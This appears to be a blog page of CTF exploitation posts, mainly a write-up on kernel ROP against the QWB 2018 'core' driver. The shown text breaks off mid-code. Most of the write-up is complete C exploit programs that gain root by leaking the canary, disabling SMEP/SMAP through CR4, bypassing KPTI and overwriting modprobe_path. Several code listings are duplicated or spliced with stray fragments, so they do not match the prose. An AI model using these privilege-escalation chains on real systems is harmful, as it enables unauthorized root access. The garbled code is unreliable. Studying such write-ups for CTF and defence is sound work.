Skip to main content

「Pwn」粗浅分析 House Of Muney

· 12 min read
Muel - Nova
Anime Would PWN This WORLD into 2D

前几天 ZBR 发了这个 repo,我寻思没听过,看着攻击能力还挺强的,于是浅浅分析一下。

简单来说,这个 house 能做这样一件事:在没有泄露的情况下绕过 ASLR 实现代码执行。

而它的利用条件如下:

  • Partial RELRO / No RELRO —— 它需要修改 .dynsym 去修改 dlresolve 结果
  • 可以分配较大的堆 —— 要使其由 MMAP 分配
  • 能够改写这个堆的 prev_size 和 size 字段,使得 IS_MMAPED 位被改写

本文将基于 2.31 的环境,复现 Docker 可以使用下面的 Dockerfile:

FROM ubuntu:20.04

ENV DEBIAN_FRONTEND noninteractive

# Update
RUN apt-get update -y && apt-get install socat -y gdb vim tmux python3 python3-pip

# General things needed for pwntools and pwndbg to run
RUN apt-get install git build-essential libssl-dev libffi-dev libxml2-dev libxslt1-dev zlib1g-dev patchelf python3-dev -y

RUN pip3 install pwn

# Install pwndbg
RUN git clone https://github.com/pwndbg/pwndbg && cd pwndbg && ./setup.sh && cd ../

RUN echo "set auto-load safe-path /" >> /root/.gdbinit

# Challenge files to ADD
RUN git clone https://github.com/mdulin2/house-of-muney

# Fixes the loader and recompiles the binary for us :)
RUN cd house-of-muney && ./compile.sh

Off-by-null 的利用方法

· 20 min read
Muel - Nova
Anime Would PWN This WORLD into 2D

不知道为什么以前都不把这些记录下来,然后每次做到的时候都会忘了从零开始学。

本文将主要介绍 2.23 和 2.31 版本下的利用,2.27 和 2.23 差不多,多填一个 tcache 即可。2.29 和 2.31 也差不多,多了一个 key。

因此,阅读本文你需要对 Heap 的分配有一定的基础,本文将更多涉及方法而非原理。

本文涉及的挑战主要有以下几个特征

  • 存在 off-by-null
  • 分配次数几乎不受限
  • 分配大小几乎不受限或是能分配 largebin 范围
  • 不存在 edit 函数或只能 edit 一次
  • 只能 show 一次(按理来说不能 show 也可以,但是堆块分配太麻烦了,做这种题不如睡觉)

Real-time Synchronization of OneDrive with inotify in WSL2

· 4 min read
Muel - Nova
Anime Would PWN This WORLD into 2D

Recently, I've been working on some development projects, and I keep all my projects on OneDrive, using ln -s to create a symbolic link in WSL2 for development.

The IO performance across file systems like WSL2 ext4 and NTFS is painfully slow. Some venv and node_modules also heavily pollute my OneDrive. Despite some optimizations, frequent use of commands like git status has made me somewhat dissatisfied with this approach. However, I've always felt that the benefits of OneDrive synchronization outweigh these side effects, so I haven't done anything about it. Yesterday, I came across Dev Drive and suddenly thought, why not change it?

Considering that projects typically involve a large number of files, mostly small ones, I decided to migrate certain folders to WSL2 and use Robocopy to synchronize content bidirectionally between OneDrive and WSL2, trading space for efficiency.

This article will be tailored to my specific use case. If you just need to back up WSL2 content to OneDrive, I recommend referring to this article.

kernel_emergency

· 18 min read
#!/bin/bash

# Default target folder
folder="fs"

# Parse parameters
while [[ "$#" -gt 0 ]]; do
case $1 in
-f | --folder)
folder="$2"
shift
;;
*)
cpio_path="$1"
;;
esac
shift
done

# Check if cpio_path is provided
if [[ -z "$cpio_path" ]]; then
echo "Usage: $0 [-f|--folder folder_name] cpio_path"
exit 1
fi

# Create target folder
mkdir -p "$folder"

# Copy cpio_path to target folder
cp "$cpio_path" "$folder"

# Get file name
cpio_file=$(basename "$cpio_path")

# Enter target folder
cd "$folder" || exit

# Check if file is gzip compressed
if file "$cpio_file" | grep -q "gzip compressed"; then
echo "$cpio_file is gzip compressed, checking extension..."

# Check if file name has .gz suffix
if [[ "$cpio_file" != *.gz ]]; then
mv "$cpio_file" "$cpio_file.gz"
cpio_file="$cpio_file.gz"
fi

echo "Decompressing $cpio_file..."
gunzip "$cpio_file"
# Remove .gz suffix to get decompressed file name
cpio_file="${cpio_file%.gz}"
fi

# Extract cpio file
echo "Extracting $cpio_file to file system..."
cpio -idmv <"$cpio_file"
rm "$cpio_file"
echo "Extraction complete."
#!/bin/sh

if [[ $# -ne 1 ]]; then
echo "Usage: $0 cpio_path"
exit 1
fi

cpio_file="../$1"

find . -print0 |
cpio --null -ov --format=newc |
gzip -9 >"$cpio_file"
#!/bin/sh

folder="fs"
cpio_file="initramfs.cpio.gz"
gcc_options=()

while [[ $# -gt 0 ]]; do
case $1 in
-f|--folder)
folder="$2"
shift
;;
-c|--cpio)
cpio_file="$2"
shift
;;
-*)
gcc_options+=("$1")
;;
*)
src="$1"
;;
esac
shift
done

if [ -z "$src" ]; then
echo "Usage: compile.sh [options] <source file>"
echo "Options:"
echo " -f, --folder <folder> Specify the folder to store the compiled binary"
echo " -c, --cpio <file> Specify the cpio file name"
echo " <other options> Options to pass to musl-gcc"
exit 1
fi

out=$(basename "$src" .c)

echo -e "\033[35mCompiling $src to $folder/$out\033[0m"
musl-gcc -static "${gcc_options[@]}" "$src" -Os -s -o "$out" -masm=intel
strip "$out"
mv "$out" "$folder/"
cd "$folder"

echo -e "\033[35mCreating cpio archive $cpio_file...\033[0m"
find . -print0 | cpio --null -ov --format=newc | gzip -9 > "../${cpio_file}"
echo -e "\033[35mDone\033[0m"

Kernel ROP

In this section, we will gradually enhance the protection measures step by step based on the QWB 2018 core challenge.

Analysis

Since the vulnerability analysis is very straightforward, we will not go into details. You can search for keywords to view the analysis.

Lv1. KCanary + KASLR

Initially, I wanted to disable KCanary as well, but it requires recompiling the kernel, which is too cumbersome.

Thus, Lv1 is the scenario with KCanary enabled and all other protections disabled.

qemu-system-x86_64 \
-m 128M \
-kernel ./bzImage \
-initrd ./initramfs.cpio.gz \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet" \
-s \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic

In this scenario, we only need to read /tmp/kallsyms to get the addresses of commit_creds and prepare_kernel_cred functions.

However, since we can directly obtain the addresses, having KASLR does not make much difference, so we combine the two.

First, we need to find the addresses of commit_creds and prepare_kernel_cred functions.

syms = fopen("/tmp/kallsyms", "r");
if (syms == NULL) {
puts("\033[31m\033[1m[-] Open /tmp/kallsyms failed.\033[0m");
exit(0);
}

while (fscanf(syms, "%lx %s %s", &addr, type, name)) {
if (prepare_kernel_cred && commit_creds) {
break;
}

if (!prepare_kernel_cred && strcmp(name, "prepare_kernel_cred") == 0) {
prepare_kernel_cred = addr;
printf("\033[33m\033[1m[√] Found prepare_kernel_cred: %lx\033[0m\n", prepare_kernel_cred);
}

if (!commit_creds && strcmp(name, "commit_creds") == 0) {
commit_creds = addr;
printf("\033[33m\033[1m[√] Found commit_creds: %lx\033[0m\n", commit_creds);
}
}

Then, we need to calculate the offset. Using tools like checksec, we can see that PIE is at 0xffffffff81000000, and we can also find the address of commit_creds under this base.

e = ELF('./vmlinux.unstripped')
hex(e.sym['commit_creds'])

Thus, the offset is calculated as follows:

offset = commit_creds - 0x9c8e0 - 0xffffffff81000000;

At this point, using the stack overflow, we can modify the return address.

// musl-gcc -static -masm=intel -Wno-error=int-conversion -o exp exp.c  // makes compiler happy
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>


#define POP_RDI_RET 0xffffffff81000b2f
#define MOV_RDI_RAX_CALL_RDX 0xffffffff8101aa6a
#define POP_RDX_RET 0xffffffff810a0f49
#define POP_RCX_RET 0xffffffff81021e53
#define SWAPGS_POPFQ_RET 0xffffffff81a012da
#define IRETQ 0xffffffff81050ac2

#pragma clang diagnostic ignored "-Wconversion" // makes me happy

size_t user_cs, user_ss, user_rflags, user_sp;
size_t prepare_kernel_cred, commit_creds;
void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

void shell() {
if (!getuid()) {
system("/bin/sh");
} else {
puts("\033[31m\033[1m[-] Exploit failed.\033[0m");
exit(0);
}
}

void core_read(int fd, char* buf) {
ioctl(fd, 0x6677889B, buf);
}

void core_set_offset(int fd, size_t offset) {
ioctl(fd, 0x6677889C, offset);
}

void core_copy(int fd, size_t nbytes) {
ioctl(fd, 0x6677889A, nbytes);
}

void getroot() {
void * (*prepare_kernel_cred_ptr)(void *) = prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}


int main() {
FILE *syms;
int fd;
size_t offset;

size_t addr;
size_t canary;
char type[256], name[256];

size_t rop[0x100], i;

puts("\033[34m\033[1m[*] Start to exploit...\033[0m");
save_status();

fd = open("/proc/core", O_RDWR);
if (fd < 0) {
puts("\033[31m\033[1m[-] Open /proc/core failed.\033[0m");
exit(0);
}

syms = fopen("/tmp/kallsyms", "r");
if (syms == NULL) {
puts("\033[31m\033[1m[-] Open /tmp/kallsyms failed.\033[0m");
exit(0);
}

while (fscanf(syms, "%lx %s %s", &addr, type, name)) {
if (prepare_kernel_cred && commit_creds) {
break;
}

if (!prepare_kernel_cred && strcmp(name, "prepare_kernel_cred") == 0) {
prepare_kernel_cred = addr;
printf("\033[33m\033[1m[√] Found prepare_kernel_cred: %lx\033[0m\n", prepare_kernel_cred);
}

if (!commit_creds && strcmp(name, "commit_creds") == 0) {
commit_creds = addr;
printf("\033[33m\033[1m[√] Found commit_creds: %lx\033[0m\n", commit_creds);
}
}

offset = commit_creds - 0x9c8e0 - 0xffffffff81000000;
core_set_offset(fd, 64);
core_read(fd, name);
canary = ((size_t *)name)[0];
printf("\033[34m\033[1m[*] offset: 0x%lx\033[0m\n", offset);
printf("\033[33m\033[1m[√] Canary: %lx\033[0m\n", canary);

for (i = 0; i < 10; i++) rop[i] = canary;
rop[i++] = (size_t)getroot;
rop[i++] = SWAPGS_POPFQ_RET + offset;
rop[i++] = 0;
rop[i++] = IRETQ + offset;
rop[i++] = (size_t)shell;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

write(fd, rop, 0x100);
core_copy(fd, 0xffffffffffff0000 | (0x100));
}

Lv2. KCanary + KASLR + SMEP + SMAP

The above method uses ret2usr, but what if we add SMEP and SMAP?

qemu-system-x86_64 \
-m 128M \
-kernel ./bzImage \
-cpu qemu64-v1,+smep,+smap \
-initrd ./initramfs.cpio.gz \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet" \
-s \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic

Method 0x1 - KROP

The simplest approach is to use the overflow directly to write the ROP chain.```c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/types.h> #include <sys/ioctl.h>

#define POP_RDI_RET 0xffffffff81000b2f #define MOV_RDI_RAX_CALL_RDX 0xffffffff8101aa6a #define POP_RDX_RET 0xffffffff810a0f49 #define POP_RCX_RET 0xffffffff81021e53 #define SWAPGS_POPFQ_RET 0xffffffff81a012da #define IRETQ 0xffffffff81050ac2

size_t user_cs, user_ss, user_rflags, user_sp; size_t prepare_kernel_cred, commit_creds; void save_status() { asm("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;"); puts("\033[34m\033[1m[*] Status has been saved.\033[0m"); }

void shell() { if (!getuid()) { system("/bin/sh"); } else { puts("\033[31m\033[1m[-] Exploit failed.\033[0m"); exit(0); } }

void core_read(int fd, char* buf) { ioctl(fd, 0x6677889B, buf); }

void core_set_offset(int fd, size_t offset) { ioctl(fd, 0x6677889C, offset); }

void core_copy(int fd, size_t nbytes) { ioctl(fd, 0x6677889A, nbytes); }

int main() { FILE *syms; int fd; size_t offset;

size_t addr;
size_t canary;
char type[256], name[256];

size_t rop[0x100], i;

puts("\033[34m\033[1m[*] Start to exploit...\033[0m");
save_status();

fd = open("/proc/core", O_RDWR);
if (fd < 0) {
puts("\033[31m\033[1m[-] Open /proc/core failed.\033[0m");
exit(0);
}

syms = fopen("/tmp/kallsyms", "r");
if (syms == NULL) {
puts("\033[31m\033[1m[-] Open /tmp/kallsyms failed.\033[0m");
exit(0);
}

while (fscanf(syms, "%lx %s %s", &addr, type, name)) {
if (prepare_kernel_cred && commit_creds) {
break;
}

if (!prepare_kernel_cred && strcmp(name, "prepare_kernel_cred") == 0) {
prepare_kernel_cred = addr;
printf("\033[33m\033[1m[√] Found prepare_kernel_cred: %lx\033[0m\n", prepare_kernel_cred);
}

if (!commit_creds && strcmp(name, "commit_creds") == 0) {
commit_creds = addr;
printf("\033[33m\033[1m[√] Found commit_creds: %lx\033[0m\n", commit_creds);
}
}

offset = commit_creds - 0x9c8e0 - 0xffffffff81000000;
core_set_offset(fd, 64);
core_read(fd, name);
canary = ((size_t *)name)[0];
printf("\033[34m\033[1m[*] offset: 0x%lx\033[0m\n", offset);
printf("\033[33m\033[1m[√] Canary: %lx\033[0m\n", canary);

for (i = 0; i < 10; i++) rop[i] = canary;
rop[i++] = POP_RDI_RET + offset;
rop[i++] = 0;
rop[i++] = prepare_kernel_cred;
rop[i++] = POP_RDX_RET + offset;
rop[i++] = POP_RCX_RET + offset;
rop[i++] = MOV_RDI_RAX_CALL_RDX + offset;
rop[i++] = commit_creds;
rop[i++] = SWAPGS_POPFQ_RET + offset;
rop[i++] = 0;
rop[i++] = IRETQ + offset;
rop[i++] = (size_t)shell;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

write(fd, rop, 0x100);
core_copy(fd, 0xffffffffffff0000 | (0x100));

}


#### Method 0x2 - Disable SMEP/SMAP

The above method is not strictly considered "bypassing." Therefore, let's continue to look at how SMEP and SMAP operate.

![image.png](https://i.loli.net/2021/09/07/sYFKuZiUVNIclBp.png)

So, in essence, they are just two bits in the CR4 register, which we can set to zero.

Using ropper, we look for any gadgets that can pop cr4, but none are found. Instead, we find a gadget that moves cr4:

`0xffffffff81002515: mov cr4, rax; push rcx; popfq; ret;`

We then rearrange the ROP chain to set cr4 to 0x6f0 (for simplicity, you can also use other gadgets to precisely xor or not).

```c
for (i = 0; i < 10; i++) rop[i] = canary;
rop[i++] = POP_RAX_RET + offset;
rop[i++] = 0x6f0;
rop[i++] = MOV_CR4_RAX_PUSH_RCX_POPFQ_RET + offset;
rop[i++] = (size_t)getroot;
rop[i++] = SWAPGS_POPFQ_RET + offset;
rop[i++] = 0;
rop[i++] = IRETQ + offset;
rop[i++] = (size_t)shell;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

Lv.3 KCanary + KASLR + SMEP + SMAP + KPTI

If KPTI is added, the previous method 0x2 cannot be used. However, method 0x1 can still be used because KPTI only enforces isolation. However, since the PGD is in kernel mode when we are in kernel space, we need to perform additional operations to switch back.

KPTI, in simple terms, uses a 4MB PGD, with 04MB for user-mode PGD and 48MB for kernel-mode PGD. Switching can be done efficiently by toggling the 13th bit of the CR3 register.

qemu-system-x86_64 \
-m 128M \
-cpu qemu64-v1,+smep,+smap \
-kernel ./bzImage \
-initrd ./initramfs.cpio.gz \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr pti=on" \
-s \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic \

Method 0x1 - swapgs_restore_regs_and_return_to_usermode

The simplest approach is to directly use the correct switching statements from swapgs_restore_regs_and_return_to_usermode. The operations related to registers and stack in this function can be summarized as follows, so we add two padding instructions:

mov  rdi, cr3
or rdi, 0x1000
mov cr3, rdi
pop rax
pop rdi
swapgs
iretq
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>


#define POP_RDI_RET 0xffffffff81000b2f
#define MOV_RDI_RAX_CALL_RDX 0xffffffff8101aa6a
#define POP_RDX_RET 0xffffffff810a0f49
#define POP_RCX_RET 0xffffffff81021e53
#define POP_RAX_RET 0xffffffff810520cf
#define MOV_CR4_RAX_PUSH_RCX_POPFQ_RET 0xffffffff81002515
#define SWAPGS_POPFQ_RET 0xffffffff81a012da
#define IRETQ 0xffffffff81050ac2
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81a008f0

#pragma clang diagnostic ignored "-Wconversion" // makes me happy

size_t user_cs, user_ss, user_rflags, user_sp;
size_t prepare_kernel_cred, commit_creds;
void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

void shell() {
if (!getuid()) {
system("/bin/sh");
} else {
puts("\033[31m\033[1m[-] Exploit failed.\033[0m");
exit(0);
}
}

void core_read(int fd, char* buf) {
ioctl(fd, 0x6677889B, buf);
}

void core_set_offset(int fd, size_t offset) {
ioctl(fd, 0x6677889C, offset);
}

void core_copy(int fd, size_t nbytes) {
ioctl(fd, 0x6677889A, nbytes);
}

void getroot() {
void * (*prepare_kernel_cred_ptr)(void *) = prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}


int main() {
FILE *syms;
int fd;
size_t offset;

size_t addr;
size_t canary;
char type[256], name[256];

size_t rop[0x100], i;

puts("\033[34m\033[1m[*] Start to exploit...\033[0m");
save_status();

fd = open("/proc/core", O_RDWR);
if (fd < 0) {
puts("\033[31m\033[1m[-] Open /proc/core failed.\033[0m");
exit(0);
}

syms = fopen("/tmp/kallsyms", "r");
if (syms == NULL) {
puts("\033[31m\033[1m[-] Open /tmp/kallsyms failed.\033[0m");
exit(0);
}

while (fscanf(syms, "%lx %s %s", &addr, type, name)) {
if (prepare_kernel_cred && commit_creds) {
break;
}

if (!prepare_kernel_cred && strcmp(name, "prepare_kernel_cred") == 0) {
prepare_kernel_cred = addr;
printf("\033[33m\033[1m[√] Found prepare_kernel_cred: %lx\033[0m\n", prepare_kernel_cred);
}

if (!commit_creds && strcmp(name, "commit_creds") == 0) {
commit_creds = addr;
printf("\033[33m\033[1m[√] Found commit_creds: %lx\033[0m\n", commit_creds);
}
}

offset = commit_creds - 0x9c8e0 - 0xffffffff81000000;
core_set_offset(fd, 64);
core_read(fd, name);
canary = ((size_t *)name)[0];
printf("\033[34m\033[1m[*] offset: 0x%lx\033[0m\n", offset);
printf("\033[33m\033[1m[√] Canary: %lx\033[0m\n", canary);

for (i = 0; i < 10; i++) rop[i] = canary;
rop[i++] = POP_RDI_RET + offset;
rop[i++] = 0;
rop[i++] = prepare_kernel_cred;
rop[i++] = POP_RDX_RET + offset;
rop[i++] = POP_RCX_RET + offset;
rop[i++] = MOV_RDI_RAX_CALL_RDX + offset;
rop[i++] = commit_creds;
rop[i++] = SWAPGS_POPFQ_RET + offset;
rop[i++] = 0;
rop[i++] = IRETQ + offset;
rop[i++] = (size_t)shell;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

write(fd, rop, 0x100);
core_copy(fd, 0xffffffffffff0000 | (0x100));

}
```offset;
rop[i++] = commit_creds;
rop[i++] = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + offset;
rop[i++] = 0;
rop[i++] = 0;
rop[i++] = (size_t)shell;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

write(fd, rop, 0x100);
core_copy(fd, 0xffffffffffff0000 | (0x100));
}

Method 0x2 - Signal Handling

If we return directly without switching page tables, we can see it reports a SEGMENTATION FAULT instead of panicking, which indicates that we have actually returned to user mode. In this case, we can simply use a signal handler to handle the situation.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>

#define POP_RDI_RET 0xffffffff81000b2f
#define MOV_RDI_RAX_CALL_RDX 0xffffffff8101aa6a
#define POP_RDX_RET 0xffffffff810a0f49
#define POP_RCX_RET 0xffffffff81021e53
#define POP_RAX_RET 0xffffffff810520cf
#define MOV_CR4_RAX_PUSH_RCX_POPFQ_RET 0xffffffff81002515
#define SWAPGS_POPFQ_RET 0xffffffff81a012da
#define IRETQ 0xffffffff81050ac2

#pragma clang diagnostic ignored "-Wconversion" // makes me happy

size_t user_cs, user_ss, user_rflags, user_sp;
size_t prepare_kernel_cred, commit_creds;
void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

void shell() {
if (!getuid()) {
system("/bin/sh");
} else {
puts("\033[31m\033[1m[-] Exploit failed.\033[0m");
exit(0);
}
}

void core_read(int fd, char* buf) {
ioctl(fd, 0x6677889B, buf);
}

void core_set_offset(int fd, size_t offset) {
ioctl(fd, 0x6677889C, offset);
}

void core_copy(int fd, size_t nbytes) {
ioctl(fd, 0x6677889A, nbytes);
}

void getroot() {
void * (*prepare_kernel_cred_ptr)(void *) = prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}

int main() {
FILE *syms;
int fd;
size_t offset;

size_t addr;
size_t canary;
char type[256], name[256];

size_t rop[0x100], i;

puts("\033[34m\033[1m[*] Start to exploit...\033[0m");
save_status();
signal(SIGSEGV, shell);

fd = open("/proc/core", O_RDWR);
if (fd < 0) {
puts("\033[31m\033[1m[-] Open /proc/core failed.\033[0m");
exit(0);
}

syms = fopen("/tmp/kallsyms", "r");
if (syms == NULL) {
puts("\033[31m\033[1m[-] Open /tmp/kallsyms failed.\033[0m");
exit(0);
}

while (fscanf(syms, "%lx %s %s", &addr, type, name)) {
if (prepare_kernel_cred && commit_creds) {
break;
}

if (!prepare_kernel_cred && strcmp(name, "prepare_kernel_cred") == 0) {
prepare_kernel_cred = addr;
printf("\033[33m\033[1m[√] Found prepare_kernel_cred: %lx\033[0m\n", prepare_kernel_cred);
}

if (!commit_creds && strcmp(name, "commit_creds") == 0) {
commit_creds = addr;
printf("\033[33m\033[1m[√] Found commit_creds: %lx\033[0m\n", commit_creds);
}
}

offset = commit_creds - 0x9c8e0 - 0xffffffff81000000;
core_set_offset(fd, 64);
core_read(fd, name);
canary = ((size_t *)name)[0];
printf("\033[34m\033[1m[*] offset: 0x%lx\033[0m\n", offset);
printf("\033[33m\033[1m[√] Canary: %lx\033[0m\n", canary);

for (i = 0; i < 10; i++) rop[i] = canary;
rop[i++] = POP_RDI_RET + offset;
rop[i++] = 0;
rop[i++] = prepare_kernel_cred;
rop[i++] = POP_RDX_RET + offset;
rop[i++] = POP_RCX_RET + offset;
rop[i++] = MOV_RDI_RAX_CALL_RDX + offset;
rop[i++] = commit_creds;
rop[i++] = SWAPGS_POPFQ_RET + offset;
rop[i++] = 0;
rop[i++] = IRETQ + offset;
rop[i++] = (size_t)shell;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

write(fd, rop, 0x100);
core_copy(fd, 0xffffffffffff0000 | (0x100));
}

Lv.4 KCANARY + FGKASLR + SMEP + SMAP + KPTI

For this challenge, FGKASLR is not very useful because we can know the positions of all symbols. Moreover, it was not actually enabled during compilation (xiao).

Method 0x1 - .text Gadgets

We will use the original method, but this time we need to calculate the offset using swapgs_restore_regs_and_return_to_usermode because the range from 0xffffffff81000000 to 0xffffffff83000000 is within the same section, and the offset remains constant. Our gadgets are located in this segment.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>

#define POP_RDI_RET 0xffffffff81000b2f
#define MOV_RDI_RAX_CALL_RDX 0xffffffff8101aa6a
#define POP_RDX_RET 0xffffffff810a0f49
#define POP_RCX_RET 0xffffffff81021e53
#define POP_RAX_RET 0xffffffff810520cf
#define MOV_CR4_RAX_PUSH_RCX_POPFQ_RET 0xffffffff81002515
#define SWAPGS_POPFQ_RET 0xffffffff81a012da
#define IRETQ 0xffffffff81050ac2

#pragma clang diagnostic ignored "-Wconversion" // makes me happy

size_t user_cs, user_ss, user_rflags, user_sp;
size_t prepare_kernel_cred, commit_creds, swapgs_restore_regs_and_return_to_usermode;
void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

void shell() {
if (!getuid()) {
system("/bin/sh");
} else {
puts("\033[31m\033[1m[-] Exploit failed.\033[0m");
exit(0);
}
}

void core_read(int fd, char* buf) {
ioctl(fd, 0x6677889B, buf);
}

void core_set_offset(int fd, size_t offset) {
ioctl(fd, 0x6677889C, offset);
}

void core_copy(int fd, size_t nbytes) {
ioctl(fd, 0x6677889A, nbytes);
}

void getroot() {
void * (*prepare_kernel_cred_ptr)(void *) = prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}

int main() {
FILE *syms;
int fd;
size_t offset;

size_t addr;
size_t canary;
char type[256], name[256];

size_t rop[0x100], i;

puts("\033[34m\033[1m[*] Start to exploit...\033[0m");
save_status();
signal(SIGSEGV, shell);

fd = open("/proc/core", O_RDWR);
if (fd < 0) {
puts("\033[31m\033[1m[-] Open /proc/core failed.\033[0m");
exit(0);
}

syms = fopen("/tmp/kallsyms", "r");
if (syms == NULL) {
puts("\033[31m\033[1m[-] Open /tmp/kallsyms failed.\033[0m");
exit(0);
}

while (fscanf(syms, "%lx %s %s", &addr, type, name)) {
if (prepare_kernel_cred && commit_creds && swapgs_restore_regs_and_return_to_usermode) {
break;
}

if (!prepare_kernel_cred && strcmp(name, "prepare_kernel_cred") == 0) {
prepare_kernel_cred = addr;
printf("\033[33m\033[1m[√] Found prepare_kernel_cred: %lx\033[0m\n", prepare_kernel_cred);
}

if (!commit_creds && strcmp(name, "commit_creds") == 0) {
commit_creds = addr;
printf("\033[33m\033[1m[√] Found commit_creds: %lx\033[0m\n", commit_creds);
}

if (!swapgs_restore_regs_and_return_to_usermode && strcmp(name, "swapgs_restore_regs_and_return_to_usermode") == 0) {
swapgs_restore_regs_and_return_to_usermode = addr;
printf("\033[33m\033[1m[√] Found swapgs_restore_regs_and_return_to_usermode: %lx\033[0m\n", swapgs_restore_regs_and_return_to_usermode);
}
}

offset = swapgs_restore_regs_and_return_to_usermode - 0xa008da - 0xffffffff81000000;
core_set_offset(fd, 64);
core_read(fd, name);
canary = ((size_t *)name)[0];
printf("\033[34m\033[1m[*] offset: 0x%lx\033[0m\n", offset);
printf("\033[33m\033[1m[√] Canary: %lx\033[0m\n", canary);

for (i = 0; i < 10; i++) rop[i] = canary;
rop[i++] = POP_RDI_RET + offset;
rop[i++] = 0;
rop[i++] = prepare_kernel_cred;
rop[i++] = POP_RDX_RET + offset;
rop[i++] = POP_RCX_RET + offset;
rop[i++] = MOV_RDI_RAX_CALL_RDX + offset;
rop[i++] = commit_creds;
rop[i++] = SWAPGS_POPFQ_RET + offset;
rop[i++] = 0;
rop[i++] = IRETQ + offset;
rop[i++] = (size_t)shell;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

write(fd, rop, 0x100);
core_copy(fd, 0xffffffffffff0000 | (0x100));
}
``````c
_CALL_RDX + offset;
rop[i++] = commit_creds;
rop[i++] = SWAPGS_POPFQ_RET + offset;
rop[i++] = 0;
rop[i++] = IRETQ + offset;
rop[i++] = (size_t)shell;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

write(fd, rop, 0x100);
core_copy(fd, 0xffffffffffff0000 | (0x100));
}

Method 0x2 - __ksymtab

Next, let's assume we cannot obtain the addresses of the commit and prepare functions in their respective segments. According to the implementation of FGKASLR, we can use readelf --section-headers -W vmlinux | grep -vE 'ax' to see which sections do not undergo additional offsets. We can observe a __ksymtab section, which stores the offset from the current address to the symbol, and its offset to the kernel base address is fixed.

We can achieve this using similar gadgets:

push rax; ret;
__ksymtab_commit_creds - 0x10;
mov rax, [rax + 0x10];
push rdi; ret;
__ksymtab_commit_creds;
add rdi, rax;
; RDI is commit_creds now

However, in this problem, I found that the vmlinux stores not offsets but direct addresses. A ksymtab should have three ints but only has two, not sure if it's an issue with IDA or something else. The vmlinux.stripped restored using vmlinux-to-elf does not have this symbol, so it is temporarily shelved.

Method 0x3 - modprobe_path

The third approach involves exploiting modprobe_path, a variable in the kernel located in the .data section. When executing a program with an unknown file header, it goes through do_execve() and eventually calls call_modprobe, using the file at modprobe_path to execute the program with root privileges. Thus, we only need to overwrite modprobe_path.

First, obtain the address of modprobe_path. I couldn't find the symbol table, but you can directly search the memory for "/sbin/modprobe" to locate it. After returning to user mode, create a malicious program, such as one that generates a shell with the suid bit set. It seems that doing so does not provide the root user with the PATH environment variable, so it might be better to directly copy the flag.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>

#define POP_RAX_RET 0xffffffff810520cf
#define MOV_PTR_RBX_RAX_POP_RBX_RET 0xffffffff8101e5e1
#define POP_RBX_RET 0xffffffff81000472
#define MODPROBE_PATH 0xffffffff8223d8c0
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81a008f0

#pragma clang diagnostic ignored "-Wconversion" // makes me happy

size_t user_cs, user_ss, user_rflags, user_sp;
size_t swapgs_restore_regs_and_return_to_usermode;
void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
